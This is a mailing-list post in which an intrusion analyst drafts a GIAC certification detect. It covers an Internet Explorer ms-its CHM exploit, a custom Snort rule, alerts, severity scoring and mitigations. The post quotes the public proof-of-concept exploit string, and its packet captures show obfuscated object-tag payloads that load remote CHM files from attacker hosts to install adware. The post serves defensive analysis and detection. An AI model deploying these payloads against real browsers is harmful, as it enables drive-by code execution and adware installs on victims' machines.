LOGS: GIAC GCIA Version 3.4 Practical Detect James Affeld

Greetings:  I'm going to submit this fairly soon. 
Comments welcome, criticism encouraged, enlightenment
and wise counsel craved.  My apologies for the trace
munging.  
--
Source of Trace: a network I administer. 
  
Detect was Generated by: Snort v. 2.1.2 with a
custom rule placed in local.rules.
  
#Bugtraq 9658 IE CHM vulnerability
alert tcp any $HTTP_PORTS -> $HOME_NET any
(msg:"ms-its .CHM file download!";flow:from_server,
established;content:!"children";nocase;content:".chm\:";
nocase; content:"its"; nocase;
classtype:successful-admin; sid:1000024;rev:2;)
  
This rule direct Snort to alert on any packet from
an established connection on port 80 or 443 (http
and https ports defined for $HTTP_PORTS in
snort.conf) to an internal host on any port whose
content does not include 'children', but whose
content does include both ".chm\:" and "its".  None
of the content checks are case sensitive.  The
signature id for this rule is 1000024 (in the >
1000000 range set aside by the writers of Snort for
local rules) and this is the second revision.
 
In version 2 I excluded content= children to
eliminate false positives from users going to the
Children's Hospital website, www.chmc.org. 
 
That rule generated the following alert: 
  
[**] [1:1000024:2] ms-its .CHM file download! [**]
[Classification: Successful Administrator Privilege
Gain] [Priority: 1]
05/10-16:06:13.150822 66.98.248.63:80 ->
foo.bar.100.36:2365
TCP TTL:52 TOS:0x0 ID:12487 IpLen:20 DgmLen:684 DF
***AP*** Seq: 0x88DA02C1  Ack: 0xC7082B6C  Win:
0x1920  TcpLen: 20
 
Alert Description: rule #1000024, revision 2 cause
the alert.  The classification is my catagorization
of the incident this alert detects: basically,
though current usage is mostly for putting adware
and other criminal computer intrusions, it is
possible to do pretty much anything to a victim
machine with it.  The next line has the date stamp,
source IP address and port, and destination IP
address (cleverly obfuscated) and port.  The
remaining two lines have information about the
packet that aren't relevant to this discussion.
 
Description of the Attack:: Bugtraq 9658
(http://www.securityfocus.com/bid/9658/exploit/) 
reports that hostile websites can induce Internet
Explorer to download and use (via the Windows Help
system) arbitrary files, which leads to arbitrary
code execution.  The rule that detected this attack
is easily defeated by obfuscation, but I see traffic
from bozos who can't be bothered to modify a single
string in the poc code on the Bugtraq site!  The
following lines are from the Bugtraq page cited
above:
  
"Jelmer also released the following proof-of-concept
example which may potentially bypass some filters
due to using encoded characters in the exploit
string: 

ms-its:mhtml:file://C:\foo.mht!${PATH}/EXPLOIT.CHM::/exploit.htm
"
  
Here is the tcpdump output of the packet that
triggered the alert.  Highlighted in red is the
attacking website's failure of imagination.
 
16:06:58.879664 foo.bar.100.36.2365 >
66.98.248.63.80: P 437:658(221) ack 645 win 64891
(DF) (ttl 128, id 13542)
  0000: 4500 0105 34e6 4000 8006 7daafoobar6424
E...4æ@...}ª¨.d$
  0010: 4262 f83f 093d 0050 c708 2b6c 88da 0545 
Bbø?.=.PÇ.+l.Ú.E
   0020: 5018 fd7b b2af 0000 4745 5420 2f2f 4558 
P.ý{²¯..GET //EX
  0030: 504c 4f49 542e 4348 4d20 4854 5450 2f31 
PLOIT.CHM HTTP/1
  0040: 2e31 0d0a 4163 6365 7074 3a20 2a2f 2a0d 
.1..Accept: */*.
  0050: 0a41 6363 6570 742d 456e 636f 6469 6e67 
.Accept-Encoding
  0060: 3a20 677a 6970 2c20 6465 666c 6174 650d  :
gzip, deflate.
  0070: 0a55 7365 722d 4167 656e 743a 204d 6f7a 
.User-Agent: Moz
  0080: 696c 6c61 2f34 2e30 2028 636f 6d70 6174 
illa/4.0 (compat
  0090: 6962 6c65 3b20 4d53 4945 2036 2e30 3b20 
ible; MSIE 6.0; 
  00a0: 5769 6e64 6f77 7320 4e54 2035 2e30 3b20 
Windows NT 5.0; 
  00b0: 2e4e 4554 2043 4c52 2031                
.NET CLR 1
 
Probability the Source Address was Spoofed: pretty
low.  This is part of an established tcp session, so
simple spoofing (where the attacker doesn't care
about receiving responses) is not going on.  It is
possible to spoof a tcp connection, but the attacker
would have to be between the source and (real)
destination, either in fact or by successfully using
source routing to get traffic to go through the
attacker.  Then the attacker would have to
successfully guess the ISN (Initial Sequence Number)
to impersonate one of the hosts.  The internal host
is running currently patched Windows 2000, which is
only mildly vulnerable to ISN guessing. 
(http://razor.bindview.com/publish/papers/tcpseq.html)
 
Description of the Attack: 
>From 
http://www.security.nnov.ru/search/news.asp?binid=3590
:
"HTTP redirection to ms-its (and few others)
protocol exploiting directory traversal bug cause
CHM file to be saved to known location. With another
directory traversal bug HTML from CHM file can be
executed in local zone." Per Bugtraq: "The issue may
be exploited via the ITS (InfoTech Storage) Protocol
URI handler. It is possible to use this protocol to
force a browser into the Local Zone by redirecting
into a non-existent MHTML file (using other known
vulnerabilities). In this manner, it may be possible
to reference hostile content to be executed in the
Local Zone, such as a malicious CHM file. The issue,
in combination with other vulnerabilities, is
exploitable to provide for automatic delivery and
execution of an arbitrary executable. This would
occur when malicious web content is rendered in
Internet Explorer. "
(http://www.securityfocus.com/bid/9658/discussion/)
 
Correlations:  There is a nice page describing how
to use the feature for Good at:
http://www.helpware.net/htmlhelp/linktochm.htm
 
http://spamwatch.codefish.net.au/modules.php?op=modload&name=News&file=article&sid=121
has a description about "yet another trojan site
using the Microsoft Window CHM exploit."
 
Evidence of Active Targeting: This question is
usually "specific or random" targetting.  In this
case, since the webserver just sits there waiting
for us to come to it, I'd say it's passive
targetting.  
 
Severity: Severity of the incident is given by the
formula:
 
severity = (criticality + lethality) - (system
countermeasures + network countermeasures)
 
Criticality: 2 This is a standard workstation,
easily re-imaged, containing no significant local
data.  
 
Lethality: 5 "Automatic delivery and execution of an
arbitrary executable" = 0wn3d 
 
System Countermeasures: 2 We do what we can, but
short of crippling the Help system, we can't really
mitigate this.  There is currently no patch for IE. 
Using another browser will still (probably) invoke
IE to invoke the CHM.  (Thanks to all those users
who clamored to have the browser irrevocably fused
to the OS.  Somehow I think all of those users are
located at 1 Microsoft Way, and were in the minority
even there.) 
  
Network Countermeasures: 3 We catch this via IDS,
but we do not have a means of preventing this
content from reaching the desktop.  A proxy server
might give us a way to do this, or an application
firewall.  The offending website (and its neighbors)
are now blocked at the router.  
 
Severity = (2+5) - (2+3) = 2
 
Defensive Recommendation:  a web proxy with the
ability to block pages with specific content would
give us the means to do more than just watch this
stuff as it goes whizzing past the IDS.  Blocking
and shaming the offending websites might do some
good.  
 
Multiple Choice Question:
 
An effective way to mitigate the Microsoft Internet
Explorer ITS Protocol Zone Bypass Vulnerability is:
 
A)    Use another browser besides Internet Explorer
B)     Proxy Server with filtering ability
C)    Disable the ms-its protocol handler, which
"may have a negative impact on the Windows Help
system" 
D)    Use another operating system besides Windows
 
Answer: B, C, and D.  A may not work against this,
because Windows will invoke Internet Explorer for .CHM
files unless you have gone to extreme lengths to
disable it. 
 
Misc. Other Captures: 

In this sample, we don't just have the simple POC
code swiped directly from the bugtraq announcement. 
No! They had to have the Extra Evil poc, with extra
obfuscation suggested by "Jelmer" on the Bugtraq
site.   To review, Jelmer substitutes '#109' for 'm'
- they are synonymous.   Here is Jelmer's suggestion
in full:

ms-its:mhtml:file://C:\foo.mht!${PATH}/EXPLOIT.CHM::/exploit.htm
"
 
Since it is harder to write '#109' and they do not
similarly obfuscate the other letters, this looks
like they are trying to hide something.  Here's the
excerpted bit:
 
'<object data="ms-its:mhtml:
file://C:counter.mht!${PATH}/HELP.CHM
 
For some reason, the alleged people at
savings-direct.com don't want to send the string
'ms-its:mhtml' across the wire.  This is enough to
wish that all their hopes wither until they decide
to make an honest living.  
 
bash-2.05b# tcpdump -nvvXr tcpdump.log.1083808507
'host 206.58.237.235' | more
07:43:38.182150 206.58.237.235.80 >
foo.bar.104.61.1553: P [tcp sum ok] 22258004
21:2225801059(638) ack 3254538726 win 6432 (DF) (ttl
55, id 61392)
  0000: 4500 02a6 efd0 4000 3706 8481 foobar edeb 
E..¦ïÐ@.7...Î:íë
  0010: a89c 683d 0050 0611 84ab 04e5 c1fc 51e6 
¨.h=.P...«.åÁüQæ
  0150: 456e 636f 6469 6e67 3a20 6368 756e 6b65 
Encoding: chunke
  0160: 640d 0a43 6f6e 7465 6e74 2d54 7970 653a 
d..Content-Type:
  0170: 2061 7070 6c69 6361 7469 6f6e 2f78 2d6a  
application/x-j
  0180: 6176 6173 6372 6970 740d 0a45 7870 6972 
avascript..Expir
  0190: 6573 3a20 5468 752c 2030 3620 4d61 7920  es:
Thu, 06 May
  01a0: 3230 3034 2031 343a 3433 3a32 3220 474d 
2004 14:43:22 GM
  01b0: 540d 0a0d 0a65 360d 0a0a 7070 203d 2027 
T....e6...pp = '
  01c0: 6874 7470 3a2f 2f61 6473 2e73 6176 696e 
http://ads.savin
  01d0: 6773 2d64 6972 6563 742e 6e65 742f 636f 
gs-direct.net/co
  01e0: 756e 7465 7227 3b0a 0a63 6f64 6520 3d20 
unter';..code =
  01f0: 273c 6f62 6a65 6374 2064 6174 613d 2226 
'<object data="&
  0200: 2331 3039 3b73 2d69 7473 3a26 2331 3039 
#109;s-its:m
  0210: 3b68 7426 2331 3039 3b6c 3a66 696c 653a 
;html:file:
  0220: 2f2f 433a 636f 756e 7465 722e 6d68 7421 
//C:counter.mht!
  0230: 247b 5041 5448 7d2f 4845 4c50 2e43 484d 
${PATH}/HELP.CHM
  0240: 3a3a 2f68 656c 702e 6874 6d22 2074 7970 
::/help.htm" typ
  0250: 653d 2274 6578 742f 782d 7363 7269 7074 
e="text/x-script
  0260: 6c65 7422 3e3c 2f6f 626a 6563 743e 273b 
let"></object>';
  0270: 0a64 6f63 756d 656e 742e 7772 6974 6528 
.document.write(
  0280: 636f 6465 2e72 6570 6c61 6365 282f 5c24 
code.replace(/\$
  0290: 7b50 4154 487d 2f67 2c70 7029 293b 0a0d 
{PATH}/g,pp));..
  02a0: 0a30 0d0a 0d0a                          
.0....
 
Netwin is adware/spyware - in other words, your
basic computer intrusion.  
source host is COLO-CHN1
packet excerpt is:
  01a0: 0a3c 424f 4459 3e0a 3c74 6578 foobar 7265 
.<BODY>.<textare
  01b0: 6120 6964 3d22 636f 6465 2220 7374 796c  a
id="code" styl
  01c0: 653d 2264 6973 706c 6179 3a6e 6f6e 6522 
e="display:none"
  01d0: 3e3c 6f62 6a65 6374 2064 6174 613d 2226 
><object data="&
  01e0: 2331 3039 3b73 2d69 7473 3a6d 6874 6d6c 
#109;s-its:mhtml
  01f0: 3a66 696c 653a 2f2f 433a 5c66 6f6f 2e6d 
:file://C:\foo.m
  0200: 6874 2168 7474 703a 2f2f 3230 332e 3139 
ht!http://203.19
  0210: 392e 3230 302e 3632 2f6e 6f6e 616d 652f 
9.200.62/noname/
  0220: 7368 6172 6569 742f 6578 2f4e 4554 5749 
shareit/ex/NETWI
  0230: 4e2e 4348 4d3a 3a2f 6e65 7477 696e 2e68 
N.CHM::/netwin.h
  0240: 746d 2220 7479 7065 3d22 7465 7874 2f78  tm"
type="text/x
  0250: 2d73 6372 6970 746c 6574 223e 3c2f 6f62 
-scriptlet"></ob
  0260: 6a65 6374 3e3c 2f74 6578 7461 7265 613e 
ject></textarea>
  0270: 3c73 6372 6970 7420 6c61 6e67 7561 6765 
<script language
  0280: 3d22 6a61 7661 7363 7269 7074 223e 646f 
="javascript">do
  0290: 6375 6d65 6e74 2e74 6974 6c65 203d 2027 
cument.title = '
http://www.danchan.com/weblog/vjen says, 
"We have Enterasys Dragon signatures that trigger
for these kinds of bugs, and today I garnered some
faint interest in investigating them today. I found
a shitload of occurances of this NETWIN.CHM file
showing up in advertisements. Advertising companies
on shady sites we all love to visit using IE bugs to
push adware to your computers. Yay! After work, I
did a little investigating. 
 
These 'compiled' microsoft html help files can
execute programs. 

NETWIN.CHM expands to the following:

07/06/2003 12:36 AM 65 blank.html
10/29/2002 02:39 AM 898 folder.gif
10/29/2002 02:39 AM 920 folderopen.gif
10/29/2002 05:14 PM 229 home.gif
04/26/2004 04:32 PM 324 index.html
11/08/2002 10:12 PM 5,888 JSCookTree.js
04/26/2004 04:32 PM 642 menu.htm
04/26/2004 04:32 PM 653 NETWIN.hhc
04/26/2004 04:32 PM 366 NETWIN.hhk
04/26/2004 04:32 PM 1,536 netwin.htm
10/29/2002 02:39 AM 155 page.gif
06/27/2003 11:49 PM 3,842 preview.gif
11/23/2002 12:04 AM 701 theme.css
11/22/2002 11:15 PM 199 theme.js "
 



        
                
__________________________________
Do you Yahoo!?
Yahoo! Domains ? Claim yours for only $14.70/year
http://smallbusiness.promotions.yahoo.com/offer 
_______________________________________________
Intrusions mailing list
Intrusions@xxxxxxxxxxxxxx
http://www.dshield.org/mailman/listinfo/intrusions